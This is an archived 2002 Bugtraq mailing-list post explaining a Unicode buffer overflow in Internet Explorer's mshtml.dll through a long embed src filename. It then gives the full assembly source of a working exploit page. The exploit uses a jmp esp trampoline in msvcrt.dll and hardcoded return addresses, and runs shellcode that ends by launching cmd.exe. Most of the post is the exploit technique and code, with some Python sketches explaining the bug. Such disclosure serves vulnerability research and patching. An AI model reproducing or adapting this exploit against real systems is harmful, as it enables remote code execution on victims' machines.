Bugtraq mailing list archives

Details and exploitation of buffer overflow in mshtml.dll (and few sidenotes on Unicode overflows in general)
Date: Wed, 27 Feb 2002 16:15:32 +0300


The advisory was originally posted in [1-3] two weeks ago, so I think
enough time has passed to publish some details, especially since [4,5]
contain enough information to rediscover the vulnerability.

ERRor <error(at)pochtamt.ru> discovered that IE 5.5 and 6.0 in some
cases crash on

 <embed src="filename.AAAAAAAAAA<lot of 'A's>">

with EIP 0x41004100.
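
The EIP value above can be reproduced with a short sketch. Python is
used here only for illustration, the helper names are hypothetical, and
nothing below is Internet Explorer code. Each 'A' (0x41) widens to the
bytes 41 00, so a dword read on a wide-character boundary gives
0x00410041, while a read shifted by one byte gives 0x41004100. That the
reported EIP matches the shifted read is an observation about the bytes,
not something the advisory states.

```python
import struct


def widen(text: str) -> bytes:
    """Encode text the way Windows wide strings are stored (UTF-16LE)."""
    return text.encode("utf-16-le")


def as_dword(four_bytes: bytes) -> int:
    """Interpret four bytes as a little-endian 32-bit value."""
    return struct.unpack("<I", four_bytes)[0]


wide = widen("AAA")               # bytes: 41 00 41 00 41 00
aligned = as_dword(wide[0:4])     # read starting on a wide-char boundary
shifted = as_dword(wide[1:5])     # read starting one byte later

print(wide.hex(" "))
print(hex(aligned), hex(shifted))
```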

The overflow occurs when IE concatenates the file extension to
"Software\Microsoft\Internet Explorer\EmbedExtnToClsidMappingOverride\"
with wcscat().
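
As a rough model of the missing check, the sketch below counts UTF-16
code units before concatenating. It is written in Python for
illustration only; ASSUMED_CAPACITY and both function names are
hypothetical, since the real buffer size is not given in this post.

```python
KEY_PREFIX = ("Software\\Microsoft\\Internet Explorer\\"
              "EmbedExtnToClsidMappingOverride\\")

# Assumption: the destination buffer size is NOT stated in the post.
# 260 wide characters is a placeholder chosen only for this example.
ASSUMED_CAPACITY = 260


def wide_len(text: str) -> int:
    """Number of 16-bit code units the string occupies as UTF-16."""
    return len(text.encode("utf-16-le")) // 2


def checked_concat(prefix: str, extension: str,
                   capacity: int = ASSUMED_CAPACITY) -> str:
    """Concatenate only if prefix + extension + terminator fits."""
    needed = wide_len(prefix) + wide_len(extension) + 1  # +1 for L'\0'
    if needed > capacity:
        raise ValueError(f"need {needed} wide chars, have {capacity}")
    return prefix + extension


print(checked_concat(KEY_PREFIX, "swf"))
try:
    checked_concat(KEY_PREFIX, "A" * 1000)
except ValueError as err:
    print("rejected:", err)
```

An unbounded wcscat() performs the final concatenation without the
length comparison, which is the step this model adds.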

There is another input validation bug in Internet Explorer: it fails to
detect that a file has no extension. In this case it looks for a dot
before the filename and treats everything after that dot as the
extension. So it is possible to overflow the buffer with a long filename
that has no extension.
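
The difference between the two behaviours can be modelled as follows.
This is a Python sketch of the behaviour as described above, not IE's
actual parsing code; both function names are hypothetical, and the
sample URL follows the one embedded in matrix.asm with a short run of
'A's.

```python
def naive_extension(url: str) -> str:
    """Model of the described bug: last dot anywhere in the string."""
    dot = url.rfind(".")
    return url[dot + 1:] if dot != -1 else ""


def careful_extension(url: str) -> str:
    """Look for the dot only inside the final path component."""
    name = url.rsplit("/", 1)[-1]
    dot = name.rfind(".")
    return name[dot + 1:] if dot != -1 else ""


url = "http://www.security.nnov.ru/files/iebo/X" + "A" * 8

print(repr(naive_extension(url)))    # dot found in the host name
print(repr(careful_extension(url)))  # no extension in the file name
```

With the naive lookup the "extension" grows with the length of the path
and filename, even though the filename itself contains no dot.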

The rest of this paper is for vuln-dev :)

This is the kind of Unicode buffer overflow that was discussed at length
on Vuln-Dev some time ago. Usually we do not code or release exploits
for "standard" holes such as format strings or overflows; we only point
out that a vulnerability is exploitable. The only reason for this paper
is to show how easy this sort of bug is to exploit. We do not plan to
release any exploits of this kind in the future.

There are a few problems for anyone who wants to create an exploit:

1. All data is converted to Unicode, that is, 'A' (0x41) will be
converted to the 16-bit value 0x0041 (bytes 41 00).
2. The address of the shellcode will differ depending on the number of
open Internet Explorer windows, the Windows and Internet Explorer
versions, and the patches installed.
3. The offset of the saved EIP on the stack differs between Internet
Explorer versions before and after IE5.5SP2.
4. A couple of small problems we will not describe, because withholding
them may help to stop a virus or a script kiddie with an exploit if one
appears in the wild.

Now you can try to exploit this bug yourself... I had a working exploit
after half an hour without using any debugger or disassembler :)

One of the first Unicode overflows found in the wild was the
vulnerability in an IIS ISAPI filter found by eEye [6]. They did not
produce a really working exploit, saying that exploiting this kind of
bug is hard. The bug was successfully exploited by hsj and later by the
authors of the CodeRed worm. There is an easy way to bypass the
conversion of the shellcode to Unicode: it should be in Unicode already.
This was the trick used by CodeRed (a wonderful analysis of CodeRed was
made by Andrey Kolishak in [7]). I wrote about Unicode HTML in [8] (in
fact [8] was released to prevent possible impact of this paper, but it
did not succeed, because multiple filters still don't check Unicode
HTML).

Andrey pointed out an easy (and well-known) way to avoid the second
problem, the hardcoded shellcode address. Instead of overwriting the
saved EIP with the address of our shellcode we can use an indirect jump:
overwrite EIP with the address of an instruction in the memory space of
some DLL that will jump back to our code via ebp or esp (ebp may be used
when exploiting format strings). We found jmp esp (FFE4) in all versions
of kernel32.dll and in one version of msvcrt.dll (6.10.8924.0). This
version of the DLL doesn't depend on Internet Explorer and is present in
most installations of Windows NT 4.0 and Windows 2000 we checked (but
never in Windows 95/98/ME/XP), so we used it.

The third problem was solved by overwriting all possible saved-EIP
locations and using a few NOPs and a

  call xxxx
  pop ebp

combination to get the exact address of our shellcode.

Since the exploit is in Unicode we do not need to care about '\0' bytes
(only 0x0000 and 0xFFFF are prohibited, and we have to take care with
calls and far jumps), so we made a large shellcode with visual effects.
If you like it you can download the full version of the dH &
SECURITY.NNOV Matrix screensaver from the URL given in the matrix.asm
header comment below.

The resulting HTML (it works with msvcrt.dll 6.10.8924.0 and doesn't
depend on the mshtml.dll version, the program used or the Windows
version) can be obtained from
http://www.security.nnov.ru/files/iebo/matrix.htm The same file
(properly encoded to UTF-7, UTF-8, quoted-printable or base64) may be
used to exploit Outlook Express/Outlook. (I've just noticed that under
Windows 2000 the terminal window sometimes opens in the background and
you need to switch to it... Well... It's not good, but I won't bother to
patch it :) ).

Below is source code for matrix.htm:

-=-=-=-=-=-=-=-=- begin matrix.asm -=-=-=-=-=-=-=-=-
;   matrix.asm - source code for matrix.htm
;   build:
;   tasm matrix.asm /m2
;   tlink matrix.obj, matrix.htm /t /3
;   Authors:
;     ERROR:    bug discovery
;     3APA3A:   idea and coding
;     OFFliner: matrix effects and undocumented Windows API
;   Thanx to Andrey Kolishak for indirect esp jump idea
;     you can obtain matrix screensaver from
;     http://www.security.nnov.ru/matrix
;  eipjmp: overwrites saved EIP for all versions of
;          mshtml.dll
;  espjmp: gets control after jmp esp and calls code1
;  code1:  restores EIP from stack after call to ebp
;          does some actions and jumps to code2
;  code2:  does the rest of actions

datap           equ (DataTable+080h)
hKernel32       equ LoadL-datap
cCur            equ StringTable-datap
SetCCH          equ StringTable+4-datap
GetSH           equ StringTable+8-datap
Sleep           equ StringTable+12-datap
WriteC          equ StringTable+16-datap
AllocC          equ StringTable+20-datap
SetCDM          equ StringTable+24-datap
SetCTA          equ StringTable+28-datap
SetCCI          equ StringTable+32-datap
WinE            equ StringTable+36-datap
ExitP           equ StringTable+40-datap

hStdOut         equ StringTable+48-datap
dwOldMode       equ cCur
conCur          equ StringTable+52-datap
cls             equ StringTable+56-datap
DWNumChar       equ StringTable+60-datap
RegHK           equ user-datap

_faked  segment para public 'CODE' use32
       assume cs:_faked
_faked   ends

_main  segment para public 'DATA' use32
       assume cs:_main

        begin   db      0ffh,0feh               ;Unicode prefix
                db      "<",0,"e",0,"m",0,"b",0,"e",0,"d",0,0dh,0
                db      "s",0,"r",0,"c",0,"=",0,34,0
                db      "h",0,"t",0,"t",0,"p",0,":",0,"/",0,"/",0
                db      "w",0,"w",0,"w",0,".",0
                db      "s",0,"e",0,"c",0,"u",0,"r",0,"i",0,"t",0,"y",0,".",0
                db      "n",0,"n",0,"o",0,"v",0,".",0,"r",0,"u",0
                db      "/",0,"f",0,"i",0,"l",0,"e",0,"s",0,"/",0
                db      "i",0,"e",0,"b",0,"o",0,"/",0,"X",0
                db      "!(c)3APA3A"
                db      22 dup(090h)
        pop ebp
        mov esp,ebx
        xor eax,eax
dataoffset = DataTable - code2
ebpdiff = 80h + dataoffset
        mov ax,ebpdiff
        add ebp,eax                     ;ebp points to data
        lea eax,[ebp+user-datap]
        push eax
        mov ebx,[ebp+LoadL-datap]
        mov eax,[ebx]
        mov [ebp+LoadL-datap],eax
        call eax                        ;LoadLibraryA("user32.dll")
        lea ebx,[ebp+reg-datap]
        push ebx
        push eax
        mov ebx,[ebp+GetPA-datap]
        mov eax,[ebx]
        mov [ebp+GetPA-datap],eax
        call eax                        ;GetProcAddress(.,"RegisterHotKey")
        mov [ebp+RegHK],eax
        lea edi,[ebp+rhk-datap]
        movzx esi,byte ptr[edi]
        inc edi
        xor eax,eax
        mov al,[edi]
        push eax
        inc edi
        mov al,[edi]
        push eax
        inc edi
        mov al,[edi]
        push eax
        xor eax,eax
        push eax
        call [ebp+RegHK]
        dec esi
        or esi,esi
        jnz LoopHotKey
        lea eax,[ebp+StringTable-datap] ;string "kernel32.dll"
        push eax
        call [ebp+LoadL-datap]          ;LoadLibraryA("kernel32.dll")
        mov [ebp+hKernel32],eax         ;hKernel32 = 

        lea eax, [ebp+SetCCH]
        mov [ebp+cCur],eax              ;*cCur = SetCCH
        lea edi,[ebp+funcnum-datap]
        movzx esi,byte ptr[edi]         ;esi=funcnum
        inc edi
        push edi
        push dword ptr [ebp+Hkernel32]
        call [ebp+GetPA-datap]          ;GetProcAddress(edi)
        mov ebx,[ebp+cCur]
        mov [ebx],eax                   ;save func address
        xor ecx,ecx
        mov cl,4
        add ebx,ecx
        mov [ebp+cCur],ebx              ;cCur+=4
        not ecx
        xor eax,eax
        repnz scasb                     ;find \0
        dec esi
        or esi,esi
        jnz LoopResolve

        call [ebp+AllocC]               ;AllocConsole()
        push eax                        ;nonzero if succeed
        xor eax,eax
        push eax
        call [ebp+SetCCH]               ;SetConsoleCtrlHandler(NULL,TRUE)
        xor eax,eax
        not eax
        sub al,0Ah
        push eax
        call [ebp+GetSH]                ;GetStdHandle(STD_OUTPUT_HANDLE)
        mov [ebp+hStdOut],eax           ;hStdOut=
        lea eax,[ebp+dwOldMode]
        push eax
        xor ebx,ebx
        inc ebx
        push ebx
        push dword ptr [ebp+hStdOut]
        call [ebp+SetCDM]               ;SetConsoleDisplayMode(hStdOut, 1, &dwOldMode)
        xor ebx,ebx
        mov bl,0Ah
        push ebx
        push dword ptr [ebp+hStdOut]
        call [ebp+SetCTA]               ;SetConsoleTextAttribute(hStdOut,FOREGROUND_INTENSITY|FOREGROUND_GREEN) 
        xor ebx,ebx
        mov [ebp+ConCur+4],ebx          ;ConCur.bVisible = FALSE (0)
        mov bl, 100
        mov [ebp+ConCur],ebx            ;ConCur.dwSize = 100
        lea eax, [ebp+ConCur]
        push eax
        push dword ptr [ebp+hStdOut]
        call [ebp+SetCCI]               ;SetConsoleCursorInfo(hstdOut,&ConCur)
        xor eax,eax
        mov ax,1000
        push eax
        call[ebp+Sleep]                 ;Sleep(1000);
        xor ebx,ebx
        mov bl, string-datap
        mov eax,ebp
        add eax,ebx
        mov [ebp+cCur],eax              ;cCur = string
        mov eax,ebp
        mov bx,datap-empty_string
        sub eax,ebx
        mov [ebp+cls],eax               ;set address of empty_string
LOOP1:                                  ;do do
        xor eax,eax
        push eax
        lea ebx,[ebp+DWNumChar]
        push ebx
        inc eax
        push eax
        mov eax,[ebp+cCur]
        push eax
        push dword ptr [ebp+hStdOut]
        call [ebp+WriteC]               ;WriteConsole(hStdOut,(void*)cCur,1,&DWNumChar,NULL);
        xor eax,eax
        mov al,100
        mov ecx,[ebp+cCur]
        mov bl,[ecx]
        sub bl,20
        jnz N1
        mov ax,400
N1:     mov bl,[ecx]
        sub bl,8
        jnz N2
        mov ax,2100
N2:     push eax
        call [ebp+Sleep]                ;Sleep((*cCur==' ')?400:(*cCur=='\b')?2100:100)
        mov ecx,[ebp+cCur]
        inc ecx
        mov [ebp+cCur],ecx              ;++cCur
        mov bl,[ecx]
        sub bl,9
        jnz LOOP1                       ;while(*cCur!='\t');
        call [ebp+cls]
        mov ecx,[ebp+cCur]
        inc ecx
        mov [ebp+cCur],ecx              ;++cCur
        mov bl,[ecx]
        sub bl,00Ah
        jnz LOOP1                       ;while(*cCur!='\n');
        inc ecx
        xor eax,eax
        push eax
        lea ebx,[ebp+DWNumChar]
        push ebx
        mov al,18
        push eax
        push ecx
        push dword ptr [ebp+hStdOut]
        jmp code2

codelength  = $ - begin
neednoops = 1d4h - codelength
                db neednoops dup(090h)

                dd      78024e02h
                dd      78024e02h
                dd      78024e02h
                dd      78024e02h
                dw      9090h
                dd      78024e02h       ;EIP for IE < 55SP2


                db 18 dup(090h)
        xor eax,eax                     ;ESP comes here
        mov ax,0170h
        mov ebx,esp
        sub ebx,eax
        call ebx

        call [ebp+WriteC]
        xor eax,eax
        mov ax,4000
        push eax
        call [ebp+Sleep]
        call [ebp+cls]
        lea eax,[ebp+cmdexe-datap]
        push eax
        push eax
        call [ebp+WinE]
        xor eax,eax
        push eax
        call [ebp+ExitP]
        ; some code can be pasted here
        xor eax,eax
        mov ax,1000
        push eax
        call [ebp+Sleep]        ;Sleep(1000)
        xor eax,eax
        push eax
        lea ebx,[ebp+DWNumChar]
        push ebx
        mov al,30
        push eax
        lea eax,[ebp+empty-datap]
        push eax
        push dword ptr [ebp+hStdOut]
        call [ebp+WriteC]



        LoadL   dd      780330d0h       ;LoadLibraryA import table entry
        GetPA   dd      780330cch       ;GetProcAddress import table entry


                db      "kernel32.dll",0
        funcnum db      10
                db      "SetConsoleCtrlHandler",0
                db      "GetStdHandle",0
                db      "Sleep",0
                db      "WriteConsoleA",0
                db      "AllocConsole",0
                db      "SetConsoleDisplayMode",0
                db      "SetConsoleTextAttribute",0
                db      "SetConsoleCursorInfo",0
                db      "WinExec",0
                db      "ExitProcess",0
        user    db      "user32.dll",0
        reg     db      "RegisterHotKey",0
        cmdexe  db      "cmd.exe",0
        rhk     db      5
                db      9,1,100,01bh,1,101,13,1,102,05dh,8,103,3,2,104
        empty   db      00dh,28 dup(020h),00dh,0
        string  db      00dh," Wake Up, Neo...",00dh,009h,0
                db      00dh," The Matrix has you...",00dh,009h,0
                db      00dh," Follow the White Rabbit.",00dh,008h,009h,00ah,0
                db      00dh," Knock, knock...",00dh,0
        padding db      32
                db      34,0,">",0,00ah
        copy    db      "(c) 2002 by 3APA3A, ERRor, OFFLiner"

_main   ends
   end  start
-=-=-=-=-=-=-=-=-  end matrix.asm  -=-=-=-=-=-=-=-=-


[1] dH & SECURITY.NNOV: buffer overflow in mshtml.dll
[2] Microsoft Security Bulletin MS02-005
[3] CAN-2002-0022
[4] CERT Advisory CA-2002-04 Buffer Overflow in Microsoft
    Internet Explorer
[5] ISS Alert: Buffer Overflow in Microsoft Internet Explorer
[6] All versions of Microsoft Internet Information Services Remote
    buffer overflow (SYSTEM Level Access)
[7] Andrey Kolishak, History of one vulnerability (in Russian)
[8] Bypassing content filtering software

        { , . }     |\
+--oQQo->{ ^ }<-----+ \
|  ZARAZA  U  3APA3A   }
+-------------o66o--+ /
You know my name - look up my number (The Beatles)


Current thread:
  • Details and exploitation of buffer overflow in mshtml.dll (and few sidenotes on Unicode overflows in general) 3APA3A (Feb 27)